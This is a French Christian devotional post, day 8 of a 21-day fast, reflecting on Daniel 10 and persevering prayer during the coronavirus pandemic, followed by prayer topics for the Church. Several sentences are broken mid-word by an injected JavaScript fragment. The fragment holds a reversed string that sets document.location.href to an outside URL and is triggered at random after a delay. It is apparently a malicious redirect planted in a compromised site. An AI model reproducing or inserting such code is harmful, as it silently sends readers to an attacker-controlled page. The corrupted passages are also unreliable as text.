21 jours de Jeûne et Prière : Jour 08

Persévérons !
Daniel 10
Dieu répond-il vraiment à nos prières ?
Lorsqu’on écoute les nouvelles au journal télévisé et qu’on entend que le nombre de décès dus au coronavirus augmente, ainsi que le nombre de malades et de cas répertobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriés en France et dans d’autres nations, il y a de quoi se poser des questions.
Jamais autant d’appels à la prière n’ont été lancés dans le monde entier pour une même cause, jamais autant de croyants ne se sont mobilisés dans l’intercession tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tout autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tour du globe. Alors pourquoi ne voyons-nous pas encore les fruits de nos prières ?
Le récit de ce passage des Ecritures nous apporte un éclairage sur le sujet. Daniel était dans le jeûne et la prière pour obtenir des réponses de la part du Seigneur, comme nous le sommes aujourd’hui dans notre situation particulière. Or, pendant 3 semaines, absolument rien ne s’est passé. Mais il n’a pas baissé les bras. Il a persévéré ! Et, ce n’est qu’au bout de 21 jours que la révélation lui a été donnée. C’est le Christ pré-incarné en personne, qui lui apparaît et lui dit :
«Daniel, n’aie pas peur, car dès le premier jour où tu as eu à cœur de comprendre et de t’humilier devant tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}ton Dieu, tes paroles ont été entendues, et c’est à cause d’elles que je suis venu. Le chef du royaume de Perse m’a résisté 21 jours, mais Michel, l’un des principaux chefs, est venu à mon aide et je suis resté là, près des rois de Perse. » Daniel 10 : 12-13
Que se serait-il passé si Daniel n’avait pas persévéré ? Ce chapitre nous révèle le combat spirituel qui se déroule dans les lieux célestes entre les puissances spirituelles et nous montre combien la prière persévérante fait la différence.
Le Seigneur appelle aujourd’hui Son Eglise dans tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toutes les nations à plier le genou devant Lui, à chercher Sa face, à s’humilier et à persévérer dans l’intercession pour cette crise mondiale, sachant que dès le premier jour où elle a ouvert sa bouche pour faire monter ses prières devant le trône, ses paroles ont été entendues !

Sujets de prière
Pour l’Eglise de Jésus-Christ en France et dans le monde
– Qu’un vent de repentance souffle sur l’Eglise et que beaucoup de ceux qui se sont éloignés reviennent à Dieu.
– Que les divisions et les querelles de clochers soient mises de côté et qu’un nouveau vent d’unité souffle.
– Qu’elle se lève et réponde à l’appel du Seigneur à se tenir sur la brèche.
– Que sa voix puisse à nouveau être prise en compte dans ces circonstances difficiles.
– Qu’elle prenne la détermination de persévérer jusqu’à voir ce fléau disparaître.
– Qu’elle apporte l’espérance, le réconfort, la consolation à cette société en souffrance, mais également les repères et les valeurs qui depuis des décennies ont été rejetés.
– Qu’elle soit vraiment la lumière du monde et le sel de la terre.
Que le Saint-Esprit vous inspire.
PERSÉVÉRONS !